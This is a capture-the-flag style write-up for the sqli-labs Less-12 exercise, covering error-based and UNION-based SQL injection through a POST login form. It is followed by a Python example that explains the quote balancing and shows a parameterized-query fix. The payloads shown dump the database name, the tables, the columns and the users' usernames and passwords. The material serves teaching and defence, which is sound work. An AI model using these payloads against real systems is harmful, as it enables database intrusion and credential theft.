Less-12: error-based, double-quote, POST, string-type injection (variant)
Method 1: extractvalue error-based injection
1. Dump the current database
payload pattern: "*"
The payload closes the original double-quoted string and reopens it ("*" pattern), so the SQL statement stays syntactically closed. Simply appending --+ instead does not work here.
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
2. Dump the tables
payload:
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit
3. Dump the columns (fields) of the users table
payload:
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit
4. Dump the data (field contents)
payload:
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit
Method 2: UNION-based injection
Dump the current database
uname=0") union select 1,database() --+ &passwd=admin&submit=Submit
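The following is an added example, not code from the lab or this write-up. It assumes the Less-12 login query wraps both values in ("...") (double quotes inside parentheses, as the 0") prefix above implies) and shows why the "*" pattern keeps the statement balanced while a bare --+ does not, and how binding the same input as a parameter removes the problem entirely.

```python
import sqlite3

# Assumed shape of the Less-12 query: values wrapped in ("..."), so the
# injected text must close a double quote (and sometimes a parenthesis).
VULN_TEMPLATE = ('SELECT username, password FROM users '
                 'WHERE username=("{u}") AND password=("{p}") LIMIT 1')


def build_vulnerable_query(uname: str, passwd: str) -> str:
    """String-concatenate untrusted input into the query (the flaw)."""
    return VULN_TEMPLATE.format(u=uname, p=passwd)


def quotes_and_parens_balanced(sql: str) -> bool:
    """Rough syntax check: drop everything after a '-- ' comment (the
    decoded form of --+), then count double quotes and parentheses
    outside string literals. Balanced text is what the server parses."""
    code = sql.split('-- ', 1)[0]
    depth, in_str = 0, False
    for ch in code:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            depth += (ch == '(') - (ch == ')')
    return not in_str and depth == 0


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with one sample row."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users(username TEXT, password TEXT)')
    conn.execute('INSERT INTO users VALUES ("admin", "secret")')
    return conn


def safe_lookup(conn: sqlite3.Connection, uname: str, passwd: str):
    """Parameterized form: the input is bound as data, never parsed as SQL,
    so injection strings simply fail to match any row."""
    row = conn.execute('SELECT username FROM users '
                       'WHERE username=? AND password=?',
                       (uname, passwd)).fetchone()
    return row[0] if row else None
```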